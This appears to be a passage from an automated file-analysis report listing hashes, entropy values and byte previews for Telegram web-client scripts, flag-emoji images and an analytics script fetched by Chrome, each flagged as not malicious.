                                  Size (bytes):10696
                                  Entropy (8bit):5.225077614856383
                                  Encrypted:false
                                  SSDEEP:192:HnCUz1vNz+6YWQ5PMCUNLTF63vy3fEBzXNqYyx7as/m49YA/UovoDc+Eub/:HnN1vNzHYWTavRXoYyxeqm4aAzAD/Eu7
                                  MD5:EA8D5208DADA45E8D0844877A7C93DB6
                                  SHA1:45D98FBE3DAE09A988CCCD836D39016C5100F313
                                  SHA-256:25F447387CEFB643C04E0AA816E21EDF562EBE9B7E3F7B808BDB179154FC17B8
                                  SHA-512:E95F47A6E80CEDFFFD956858247F718DB6DDDF6A9802CA324F384C0E813895A949090CBA5C2CAD59E6A14D14C736D93954596385C99103DE67844A4CD8F99D20
                                  Malicious:false
                                  Reputation:low
                                  Preview:"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[8673],{8673:(e,t,s)=>{s.r(t),s.d(t,{default:()=>S});var i=s(9822);function r(e,t){return t-Math.floor(t/e)*e}var a=s(9705),n=s(4235),o=s(1481),h=s(7836);function d(e,t,s){var i;return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e;var s=e[Symbol.toPrimitive];if(void 0!==s){var i=s.call(e,"string");if("object"!=typeof i)return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return String(e)}(t))?i:i+"")in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}class c{constructor(e,t,s){this.target=e,this.onUpdate=t,this.channel=s,d(this,"requestStates",new Map),d(this,"requestStatesByCallback",new Map),d(this,"pendingPayloads",[]),d(this,"pendingTransferables",[]),d(this,"postMessagesOnTickEnd",(0,h.Fe)((()=>{const{channel:e}=this,t=this.pendingPayloads,s=this.pendingTransferables;this.pendingPayloads=[],this.pendingTransferabl
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (18362)
                                  Category:downloaded
                                  Size (bytes):18422
                                  Entropy (8bit):5.049537820821063
                                  Encrypted:false
                                  SSDEEP:192:o/kF3DWtg5I3cTKk/Q4yZOXG/lB0wKqwztTSuIdmPignIi7SdibRs1YpZNWBvYAx:oI3Dbac/TW30J/tBROZXyEW0NZuQx
                                  MD5:8957B08675A1F50A028C9CA1B63F3FFA
                                  SHA1:B49D9F9A958A83454079F356AE144591E811798E
                                  SHA-256:FD5D096F167239210AD895C0332DE2BC95585AD11A667295E97687EFDE54162A
                                  SHA-512:1668F538D174591AC9EA415E85B1301FA7E8BD4F831ECC98DEBC3F3A849702BF34F29903BD827883034EF933ADFE7A350D3F60D83F16EC71A9FCF0ECDF677AAE
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/5193.75042954cc9da1f6d6ac.js
                                  Preview:"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5193],{5193:(e,t,n)=>{n.r(t),n.d(t,{default:()=>a});const a={Search:"Search",SavedMessages:"Saved Messages",ArchivedChats:"Archived Chats",Contacts:"Contacts",Settings:"Settings",lng_menu_night_mode:"Night Mode",lng_settings_enable_night_theme:"Enable night mode","Appearance.Animations":"ANIMATIONS",TelegramFeatures:"Telegram Features",AccDescrOpenMenu2:"Open menu",NewMessageTitle:"New Message",NewChannel:"New Channel",NewGroup:"New Group","Common.Close":"Close",FilterAllChats:"All Chats",MarkAsUnread:"Mark as unread",UnpinFromTop:"Unpin from top","ChatList.Mute":"Mute",Archive:"Archive",Delete:"Delete",DeleteChat:"Delete and exit",FromYou:"You",formatDateSchedule:"MMM d",June:"June","Month.GenJune":"June","Month.ShortJune":"Jun",MarkAsRead:"Mark as read",PinToTop:"Pin to top","ChatList.Unmute":"Unmute","Group.LeaveGroup":"Leave Group",LeaveChannel:"Leave Channel",AttachPhoto:"Photo",UnreadMessages:"Unrea
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5367
                                  Entropy (8bit):7.934455634096835
                                  Encrypted:false
                                  SSDEEP:96:c2l14gxkz+fnygv5lHnlFNSx9Y3MgprSOB/RL5dxnl8aPRW1RncsL/v3E8qf4jWQ:iTQxTlFoY3/5xRLXxnpW1Rce/v5qfAWQ
                                  MD5:28F78D2400571353EF31A8F97ABDE300
                                  SHA1:6B19B041E6BAB90B4FFA410BF8EF0249DBDA437A
                                  SHA-256:602C1048A0F7AD18B5016D4FD9E40F9A5C19D3AA52286BF193CE4859A9E48AA4
                                  SHA-512:48668A02B8681A99E756FBE0F93A04A167D1D214298014496C5EDE1C5CCB48C7E1576A59D44D758B54FC7EA2FF3F7063AC78AF81282F76388FED46A43AC2D9F9
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL......zzz...{{{.....yyy...~~~.....rtx.5v........Q_.sss............!`..[..Zqtx......qqq...xxx......vvv...www..........www.................uuu..............................................................................................................................................................................................................................................................................................................................z.......w..o..v.....j....x..i.....a..|||X|.www\x.cu.sssMs.Ho.Pn.Bj.Fe.9e.?c.Sa.2^.6Z.*X.2T.&U.%U.%T.$S.*R."R.!P..P. O..M.&L..M..K..J./G|.I..H..H..G..E..E..E..D..B..B..@..@..?..>..?..=..=..<..;..:..9..9..9..7..6u.6..5..5..4..3..2..2../..0../../..,..-..+..(..)y.%.."..%o....... `..x..^O..!...5tRNS....#)89EPRXcccgffprz..~~~~..........................Z......qIDATx..i.dWu.....^...g...3xa..... a).M .......!.!.(..HQ>!G.JD.....l.!@..I.V..8.........]]]...s..^U..LU.t.n{>.Oo
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4124
                                  Entropy (8bit):7.887080875510568
                                  Encrypted:false
                                  SSDEEP:96:rqaWQ+iiGVLMi4RlMVbWcIyl7ht/OzIztmO2:rn6KMDwydylm4mO2
                                  MD5:F0F002A3968F042993D0C18D25F67819
                                  SHA1:03032FEC7820A2C523E34FA354B05C56ADCA7B4E
                                  SHA-256:56AD2FFB00D52353696162230B41E4B2689A4AEBB2CD6D84A6F04B539C7B8DCE
                                  SHA-512:73911243DAC8C2FF297AC5417686F9F0E9EB8E8C8BE88CEA367B83C97C6CC491E7B8DA7A5DC4A7E27CCE42866ECE3156C8A09695B5A12EB9C830BC7EE4A03DB7
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fd.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...H&&o.~.kvR. .yz9" ...|}i.$.6(....htZ.w..0....?.1"v.~d...gs}...<).ht,_N.......4%c.~^...jv...e..R{n.5&.dp.......5&c.~d...gs....8)...b.~^...z.,_O.......................................................................................................................................................\.^.........s...b.........Y.......k.....s......4...Y..c..u...`....S.....S.jv.yZf...co|.B\.y:...]j.mM.J_R.s.Sc.Wd.cB}iaO|o.HZ-...L[D|j.`E0.g.=R3{dx[H=tb.?P.V6.3J.+E+t].3G.)B.vy.+CrQ<.'@.mY.1E.$>.$=.rV.qU.'>.!;.pT.3CeL=.oS jR..9.nR..6..8.!9.%;.lP..6..6. 8.kO. 8.jN.dM..4..4.!7..3aD3.hL..2.gK.iK.fJ..1.cI..0.eI..1.... 3.cG../..,.aE.VE..,.`D..*R=2.[C..*.^C..)..0..,..)..(.]B../..'.\@..&.Z?..&.Y>.X=.W<..%.U;..'.Q8..#v.(.L5.G4~...E/.B.g. o...=*.;(.7'^...2"."......tRNS......'1::JPUVWcdghjlo{~.................................................................................................................................9IDATx...=..G...gv.V....>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5739
                                  Entropy (8bit):7.947163528488347
                                  Encrypted:false
                                  SSDEEP:96:5fDdpZ2lSUFLp05MzWQFx+Tttu4cF9iWuhlnnXGMzvt5Wfzn0UWecXiw66J0P:d7Z+DrzWQFxM/V+ahlnXGMrqWid
                                  MD5:517D8DEF81B5F18F04FE7AA9EC087449
                                  SHA1:3E335C832F514FD4182D95DF41A4DDB978B3A596
                                  SHA-256:36F5983AF31271542A7AC06C7D073D86A0ABFAC021A524FA08DAE5704FB65754
                                  SHA-512:E75A45D36B6165FF6239AAE873D45A879287672422B6960C37AC8E4324EB5789233EC4B4171BBD5346E2D880C9E05075221E41D2AA591ACBCDEA7E1E3CECC560
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.U2b...X4_...U2g...U2.V3<.fc...xJj...d>.Q-[...U1.a4b..i...U2h..V.y.V3f...U2k.._...X4i../.Z[.~j...Q....................;..<........>..C..H..8..A..H....E.....H..F..H..;..D..=..A..7.....H..@..?.....1..=..O....I..=..;..9..+..8..6..I....T.4.....#.1..N...<....).a..Vm.....I..6..X..j....5..p...q.]..Hj....t.....wL.h[..S..J..A.}S.W.~...i.D:.lL.}7.xS.}...@.xY.}..s&.pE.v2.rO.w$.oR.w'.o%.oxx..z.Y.?%.m".mB.r!.k2.o$.j8.T.v...j..r..iE.p$.i..hpp.3.k..f..uvp...e .f6.i..d..c!.d..r..b .c>.h..a..a.._!.`*.a..l..^gg.".`..^ri}1.c..]..[..h..[fd...Z..Y..Y..X..c..X..Y..X_`...V..V0.\..V..X..T..T..V..]Z\.Z\...S..U..RX[.\W...Q..UWY...P..OUW...N..N..M..O..L..PRU...MOT...K..K..J.}N..INP...IEM..xJ..F.vI.|FIJ..sG.zA=F.DF..nC.u@.i@.p;.e=.k;8=..`;.c5.\7._3.Z1.V1.R-.M)d.._..]...n0...."tRNS...."/8CTUTcdegmz~................cB......IDATx^..A..0.EA..E(|H."z.;F.......4..........*E.Br7+. 1.e;..{..}..../ou..6..q|d"...*.....f/WU.K..B..e.d...tC..v...A......,.J..8z1..e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4034
                                  Entropy (8bit):7.794088396866598
                                  Encrypted:false
                                  SSDEEP:96:6scMqdrh3nUd0eAXTtM7mXrB3AIOls1bYVf5rJS1:qBh3qyZM7+APFBrJU
                                  MD5:2692F0F3D1F3C495BF5E543B5BF16493
                                  SHA1:F6D524116D562DBDEEDE403E11F8BB090C97AC5D
                                  SHA-256:6DF04945835842D20A038C494D0BDC9A6CE962D8CFA09AB65E67734DFFBD3824
                                  SHA-512:954CA3496AD2CEDC5FE29208A7151706E29476459586161237CD897B93EFB1AC6B3889DA4A6B0DC0302587111A4C135DFC77551262E13DBB573A1CF5D0FDD9A2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLlSc.lq )E.in.+I.sw.*H.fk.+I...{'/)>d.v{.)H.gl.(M......{v}q!&d..c..b...nr.9>.)H.sx.,J.ns.]c.,K.(F.uz.$B.lp 0O.rw.-L.v{.hl.#A.@E..................................................................................................................................................................................................pw.vzs...qv.lq.hm.ek.^f.gl.`gdz..Za.af.\b.T\.U\.]b.OW.T[Tn..W\.IR.IQ.QW.]`.KR.CL.MS.>G.BK.=G.=F.>H.FM.;E.:D.FLBb.Aa..;E.8B.?G@`..6@?_..5?>]..4>?]..9A.3=<[..:B;Z.:Y..0:.,79X..3;..8./8;V.7V..,65T..2:.*47R.3R.2Q..#/.*3.(2.,40O..(1.&0.4:/N..%/3M|.*3*M.-L..%..#-+J.,J...'.!+.#,.Hy0Hs.(0*H.. *(G...(..'&E~+Co%C{..%#B|z%,..#..."Az.A..."!?y..!#?r..!(=e.>w#<j.<u....;t....:z.9r%8\~...7e.7k#4T.4d.3\k..s.. 2R.1r.....Z.-Nf..b...)I.)R.(N.(i.$F.!A.7.`....tRNS....),:BUTcccdgk}~~~~~~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5631
                                  Entropy (8bit):7.8534733574544076
                                  Encrypted:false
                                  SSDEEP:96:UjLdLKzOa4e/FZYvbjDh7WxEhj0DTC5Rchb6qhVOBuS2UeH7isjRcl+b7:UjLdWzOEFZYS6AQaOc35RU+f
                                  MD5:AD4EE8AE80598025099AA142E0AD4F64
                                  SHA1:E67F75684806B6A658235FF7B57B7B3F7E3714F3
                                  SHA-256:BD693101377416A86A9BF621295A118A72DE2624EFFAD92EB960231FA76E2B84
                                  SHA-512:20571AD6CD0C3A8C0DCB840E8797956B3F8AA56B12F533CCC833898A6836277BD648358E279C606D7B20F6BC3C7E5DB30AC18EC3C8C56227D0DA44C61F30814C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1e9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.\}.[}._..k..w..~...................................................................... ....A].........r..IuA...4..!..9..9..+S.....q.........]......%..&..%..%..$..$..#..#..&..!...........T....a/..U..O...6.j;..@.]9.=;.8..6..6.N;..5..8.6..*../.....3..4..8.}8..A.'@.4A.2@.0>..<.,9.(6.%3.!/..+..(..&..$.."..!..................u..c..o...N?...q..h..f....f]..]..b..."+. &. +. ,.++..%.i!..-.Q$.}4....=". ..................|..o.{a.{e%.}.../k..f..q..h..l..h..f..j..b..g..Z..K..B..:..1..*..4..=..I..^..W..K..9..#........".. ..1..A.........^.....".. ..%..)..,.....K..\.7.-....D.........8...........l.w.........,...{.Qg8.].:xmb.e.{..t..p...'.-6.<F.JT.U\.cg.ci.ah<..<..,|..r..c..Jd.Xr.Vh.Tp.Vp)Tk.Pi.Ld1Xb.Uo.Kf.Ql.Ws.]w.b..m..h..{.......................u..r..s.K.s.....tRNS.~..............................................................................................................}/).....d......................~b.d<.............................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):7238
                                  Entropy (8bit):7.949906568964949
                                  Encrypted:false
                                  SSDEEP:192:4IAR1Utifpbuce14+9jR88QVWF56z9R1i8CP08SMLO/P/MP:5uhbPe14868QVWFO9eXis8cP
                                  MD5:6F166FB64D79564494EF12EBE2A6E77F
                                  SHA1:99469206225F5FEBEA3947E0AAD1D4463B97A0E6
                                  SHA-256:D3F6FEDB94228B2A9138636C9A7B95807387D6590769E3C4DFE77511C58EB83F
                                  SHA-512:F73CF50EF8D5CE3DCB5A7AD176E5AA9DCA4EF0C707192F61193AB671C370C016DE5DC39EA4F5D80D2CE6D82FEAB3C2CC3EDB2EE1C292295D93695D20619570A2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..8..11_..N............|||.......XS....:5.91.UQ.!.....ec.....................C>gii.gh._`.fg.gg.mi.fg.nnwvssvvvyyyXX~.{wtstuuuww|mm~yy......V.._..Z..]..a..e..j..k/*b.0-;6]..n.71.;4......./&.) .&..!.zg7[NE eKC\qbO.&.".rG..>..2-'L..!..S.{u..............?4.D9.H>.LB.VM.TJ.QG.LB.H?.D;.A8.=3.7-.3)./&.-#.(..2).4*.6-.90.;1.>5........~{K?>:2F2.Hc.?.|..{t.kc.............rj.......aX.RH.ND.YP.XO.UK.ZL.EP{2TP1nSU...n..r..x!#v%&x+,u11s88w@A{OO.HH~TT.]]. .Q..&........................hX?.}8...........................................................................................................................................}||xww_TZ..x..:..A..H..Q.HC.PJ.TM.vq.ZS.e_.rm.]V.=4.qk.c].A:.RJ.IC.c[.kd.....yu.je.ZR.}.{...NEee..B:.80.H?..mw.q...1tRNS.........Fe.ss.s........cA&......aBo.......0"..s.@....IDATx^..IN.@..QD...c..@`VF.|....y..8T..JPV .H.....?./.B.!..B.!.R7$.p...N..B...#a..-....`..8..s....d..a.....D.L.......A.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4489
                                  Entropy (8bit):7.825472341600636
                                  Encrypted:false
                                  SSDEEP:96:8jkRuxovJhcvbxcFwybMrKBpVbiHejOMxhr+Fjl0Xix:82RqvNwwprobief+Fayx
                                  MD5:59B367512A1E77F09BBDE297D480EE69
                                  SHA1:B83AACDD99F8D2F2BB39A21624932740E4D8596F
                                  SHA-256:252FE91C9648AC1A449C5972C2AFA916C21F8D7914E2DE36EE5F2536026389A7
                                  SHA-512:B56068E1C08C4E426429E28598299D2A3FFB0CB214E319A3DEB0980AAC6C8D186889455D76EB14E67FD70D14DECE76455C02A869CB88AD20217698F06BF0BB64
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpLb..Nl.~..,Lr~..)Io{..*Jol..'Gm......(Hl...(Hm[}.z..3V.=e.$Di...r..&Gm}..%Gn4\.%O~Ch.'Hnz.....%EjYy.,Lp...u...Ns...#Bg...!Bgy...Nt{..+KoNq.....Ns!@f/Ot...............................y..p......g..}..r..v..y..l..f..m.._..t..y..]..a..d..]..\..\..\..\..m..u..[..e..[..^..Z..X..[..Z..Z..Z..Z..X..Z..s..X..X..V..Y..W..V..^..V..R..V..i..c..W..U..T..T..m..W..T..S..N..R..R..W..R..Q..d..J..]..Q..Q..O..O..O..S..O..N..e..F..M..L..S..M..L..K..M..K..B..W..[..J..I..J..O..H..H..J..H..G..\..;..O..F..E..G..F..D..C..F..D..C..H..C..B..K}.C~.G}.A~.B}.@}.D|.Tx.?|.Ez.?{.>{.@z.>z.<z.>y.Cx.=y.;y.=x.Fv.;x.;w.;w.>v.:v.:v.Es.9u.8u.9t.8t.7t.:s.>r.8s.Ko.7s.6s.7r.6r.Ap.6q.6q.@n.6o.?k.4l.3j.3i.7h.;f.8f.;e.;d.:c.1d.1b.8_.0_.4\.+[.4Y.+Z.,X.1T|+U.0Qw&Q.,Nu%O~%N}*Kr%Kx%Hq&Gm"Em Bh.>d.C$<....tRNS.......$$-15=@LNUXaccejmy{~~.......................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4552
                                  Entropy (8bit):7.92901326460179
                                  Encrypted:false
                                  SSDEEP:96:pyzcewYsUGzhpsWI4d9CRMk9TVIv3FD5r7IfTslPz9fKP:pzeCzhRI47CRMkh+vL2TslPzNKP
                                  MD5:1BA79F6A2FEC07059E91FAED05D0E6D6
                                  SHA1:C73100942079C7AA454CABD6BAEB8E86EE435D85
                                  SHA-256:270813AAC27DDE5F6A168361F6B74AAAD045A941D52B0BA935E39F13E5446D11
                                  SHA-512:E806D061D612E55DBDF6E3EBA151BA22B3584DC756AAC534FB8E91034095CAC13D07985FF453576A863343675EA9CBA5FDC88CE6EE7A59025FE85E9104575815
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.*Z.)-....`;HYR;TFhhh.O@iiiF\O.G,kkk.E(.E,ccc.?".H*.@%lllhhh.D,.G)eee```eee.I,Y]c.M/...]]].M/.M/CWt.M/.@".@"RPOAPg.@F$$$).^...&&&.......@..?.....D..=.)U.&R.....o7#N..F..B.).\..........I. L.!!!.....R.Y.1\...$.....P.~F..!'.[."(.......{B,W.(.].;A.?E.v=.=C".W!.U.(Y.0g.+\.5r.8y.q9..G.;.DDD&.Y.4;.',%.Y...666..N.L)..K.xA.s<""".O05`.,,,.vG111.8>))).$*.'+..4III.+11^..)/..$.b;.17.+1...iii.{H......XXXOOO.@!!.S.<..mB]]]???```TTTddd .N.i6.e...F....V-.R2:::.p@.$*.e8....Z6#.S6c...!.......3..-2.D$.V4.-2.K.QQQ.]1.+/).Y.95.*1.a-....G(....39.H.......ZZZ..........< .@..^9......i@"{Ql|\.>..e>..&.......<=q...R.y....#N.gk..........qP......1.7...L...z~#G..%.QZ.^i%W..MROZ........AI.v{&X.....'A....Z_;_....Plz...mq.PosU..BL.Fd...~..;j6Oy6.e-O......LHcn.@z.Bs...e...KJr.du.UUlk....'tRNS.~ccc.0` ..f.Pt.w..?>......c........t.....PIDATx...?k.p..q.Cc....h...z.lN.w..M.p...sP...!dp.`.Zo.C......(to.p7...5!i..=...{;..^|.....D".H$..D".H$...K..*I...e..(.......XNU64y
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (2576)
                                  Category:dropped
                                  Size (bytes):2577
                                  Entropy (8bit):5.267238243787823
                                  Encrypted:false
                                  SSDEEP:48:Y3LHeQh3vX1wzpait6Nga0xA5G7sNaqxGcu7ui9h3aChy2XmPJKLyYaML:Yrxh3vKtaioNLG4sqxOZ3aCf0O
                                  MD5:6BF3115322CB61A0EBC7383B08053DEE
                                  SHA1:89DABEC6AFE44A46BA483ACACACF36EC30BAF4BB
                                  SHA-256:023D8E20A6DC800A6415A305418E11C27484C01AB373778D26D87E8B020961C4
                                  SHA-512:F6FFCDC250AA088DBFD871149ED8F3A63FE3CEC781958CD96D7FA4EF111ED199472223A8DA9411789781D469EBC3467497DC5E0E11DB3151D9F0C58ADC5F9C52
                                  Malicious:false
                                  Reputation:low
                                  Preview:!function(){"use strict";(t=>{const{screen:{width:e,height:a},navigator:{language:r},location:n,localStorage:i,document:c,history:o}=t,{hostname:s,href:u}=n,{currentScript:l,referrer:d}=c;if(!l)return;const f="data-",m=l.getAttribute.bind(l),h=m(f+"website-id"),p=m(f+"host-url"),g=m(f+"tag"),y="false"!==m(f+"auto-track"),b="true"===m(f+"exclude-search"),v=m(f+"domains")||"",S=v.split(",").map((t=>t.trim())),w=`${(p||""||l.src.split("/").slice(0,-1).join("/")).replace(/\/$/,"")}/api/send`,N=`${e}x${a}`,T=/data-umami-event-([\w-_]+)/,A=f+"umami-event",x=300,O=t=>{if(t){try{const e=decodeURI(t);if(e!==t)return e}catch(e){return t}return encodeURI(t)}},U=t=>{try{const{pathname:e,search:a}=new URL(t);t=e+a}catch(t){}return b?t.split("?")[0]:t},j=()=>({website:h,hostname:s,screen:N,language:r,title:O(q),url:O(D),referrer:O(_),tag:g||void 0}),k=(t,e,a)=>{a&&(_=D,D=U(a.toString()),D!==_&&setTimeout(I,x))},E=()=>!h||i&&i.getItem("umami.disabled")||v&&!S.includes(s),L=async(t,e="event")=>{if(E()
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4508
                                  Entropy (8bit):7.877422135888665
                                  Encrypted:false
                                  SSDEEP:96:U2fy+Or3dydHBLmYh9aO85e/QMGAqBBh4Z6z+dfNZ2ryGAB1XVi5PECh:RfwJEHJnw54TqBBh4Z6ziNMGXB1liv
                                  MD5:237CDDE5971884CA5CD66D437B0A9649
                                  SHA1:4761E38DCBAC8B9084A5B7BE1A7DED99C8846B9B
                                  SHA-256:308EBDBF08F9D5E7F21DABAE1856D6599DABDCBEB2001EE4A186981363E49CBB
                                  SHA-512:5CE0E11834DBB19E02F5AF3CC8D620FD5A610A94B2F1065A06FA16DC411DF159EA648739967AC4BCB1B2B4935A8117DE69EB7979E7AD019B59BAFA458C921877
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.X...d.Y...d.~`.Y...j.X..}_....F..u,.|^.Y...kS.\.Y........ui./.}$..I".a...g.Y...k.`>.~`.X...l.Y..~a..g.\!.U2..l.^#.R...........................................................................................................................................................................................................................z..........t..dp.~].p.P....l....|C.....eJ._..U.].{L\.k.wC.r5.zQ.vG.r:.}_.zV.l+.l+.m1.k*.j).i(.o<.i).rH.g%0.J.uU.g(0.I/.H.h/.d%-.F.j;.`..b#.b#.mH,.E).B2.I._.).B.Z.._%.b.&.?.e9.\.%.>).A.U..Y.".;..3.d@.U.).@.Z!.W..]+..8.P..T.#.:..6(.>.S..T..P...3..4.R.).=.N...(..5..0.X2.L.....M..G...5..,.I.#.7..*.F..B..K...(.D...-..& .3../.....$.;...$ .2.A..E...#..,....y-..".<..1..} .p(.5..s..i(.5..b&.0..h..^ ~,..b..Y..T..O... ....tRNS.... .69MScccffipv~~~~~...........................................................................................................................:.....IDATx....#g....?..u.'..:..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6383
                                  Entropy (8bit):7.947348926547583
                                  Encrypted:false
                                  SSDEEP:96:YZkZAntEOaPPxF+cP5JVZ1OBImceN9eBXAI1Lea6haUl54KmRDXsQEzSFaei3FEO:YZkZFPHJXLehM6hX54zFXEzei3ChcN
                                  MD5:6F6DA5C8B9B77CD1139F499F6039313A
                                  SHA1:1826DAE35CE7105657491C0E21863FB5DAAE958D
                                  SHA-256:6AC0E4216C48BABD2B61794238F839F031C05704D2DA403338A37D4986349277
                                  SHA-512:7F1DBCD883A9BF163CB9C683B51D33FE590CFB445FAB4D78BC830B630D0BAF62445284555A7A1516969625E710428BD50206D69E90B14A46C308F835DC4D591E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLq~..!H...$(Lxu...B.....Dgw.."H.]ifw.....C`q../_.ny..D..@ct......G....t~....KZgx.. E`p...ct..q}..C......j{.`p...E.jujz...<..Dl}.^o...C.U_......>T..ny..................................................................................................w........y..iz.......kzy......Wkp...]l.I^f}..Qb.M].3FXs..=R.DW.?S.4K.2J./F.6N.,D.8J.ES..2.%>.(@.,D.'?.%=..8.#;.,A..3..3..6..-.+@.....1..3..,..)&K.%K...'%J.a3j%J.$I..&<%I....#H...."G...%!E. D..D..C.....B.....?.....=..<..?.....7o.8..6~.5j.5|.4z.2d.2i.2z.2.....1x.0w.._..u.,Z.,s.,{.+g.+p.*q.)TY.).)o.(m.'`.&M.&w.&l.%l.%i.#V."p.#i."c. I..k. \..T..C..e..J..>..H..`..A..:..V..BQi.3Fo.?}[m._q.Gb.iz.5N.*K..bnEZ.9T.cu....:z./p.9s.......We....6x.2vD]..5r#B.2S.Ob....<Z.!=v,N.Ug.,H.%H...../u......:..-q...@..8....#F........4tRNS.....#"$02EHJRX^cdivv}~.~~...........................^#....jIDATx^..IO*A...KB...H...J..!j.D...'z.....y.N...V...y.{Q.7U.....1..c.1..c.%$!..*(..e).G.dE....*.`}..*~.S........Yp..L.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4382
                                  Entropy (8bit):7.849311276675441
                                  Encrypted:false
                                  SSDEEP:96:Ynjt4svNUmFqiIUp8NxtZjAwi50zt4kqB3+gysm8JJw1Wo+sM8Z3Z:6amFqNdNbk0fq1ndm8XXQZ
                                  MD5:1FCC75099D7990FE1C814273ECA3541D
                                  SHA1:6E6B199C763BD01FB45D025B768CC2E23F5BAFF7
                                  SHA-256:4F35ED346D3CFE96927E3EF0A787816C8CAEC2DF56927ECA0DC5AA9BF079AE25
                                  SHA-512:630921CC286735DC8CD64900FE15BF694F7AE31572735858D3543714F4769DFDE5D5183C9BDD1872E6EE41C7351D1D221F875581AFDB81095698851B0FB77335
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1e8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..LRiY.}h..7V<.wa..zk'.KDi...|.l$.FAH..j..#xT.|.l#.>Kh...m".T9.Bi<d..|.BIp..h..b\..m%.{.=O.m$m...<V.}.m$g...eH.8Wm...z.R6....m$.|d...Q5El...C..G..A..K..E..J..I..@..J..G..M..J..G..H..E..E..N..I..G..D..V..H..D..+..O..C..C..*..N..F..B..@..5..\..@..@..S..C..>..5..?..c..H..<..=..W..=..X..2..<..C..;..d..R..=..Y.k.@.].{..@.k.._.6.>.u.?.=.j.s..d.<.9..X..i..W..t.8~.o.7l.t..5i.o\.xP.|..2k..C..D.|..19..e..8..5..1..l....,'..\..M.~...f.......,P.z;.x/.nB.v_....lS...{)3.qF.s#.n6.o".m..s.v'$.l%.k .kTz.L|...q..i%.j..h&.h..g@z..p&..f8.h..e..d&.f..c.m"..b..b..a..a.j .._<s.1u..._..^/t...^,t...].s...\%.^.r...\&r...[,q...[+o.%o.0l.*m.(l.jb+..V'k.&j.9e."{V%i.$h."xT'g.#g."f..|P!d.'b. c..sN.a.._.&Z..[..oH.jH.U..dD.R. Py._>.M{.Js.X;.S6.Dn.Bi.@f.M2.=_.9Y.5UC.c.....tRNS......!%).8;EHU\ceddu}|~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4963
                                  Entropy (8bit):7.887288503040064
                                  Encrypted:false
                                  SSDEEP:96:NQcoLPVfk2g+kUSqpwcB5WP59jXctQ1NH8gIaXXVIuVK14N:a8hrUSqGc49jXctQegIwSHyN
                                  MD5:03DE615A8A5A564CD3B9856E8E5A35A7
                                  SHA1:887455BC6C3322F51B4AC6703D497799B4A2C297
                                  SHA-256:410BD2F65506FE08B223222DC2DA1C6555B170EABFA46D0B7B3F2594BE947F4E
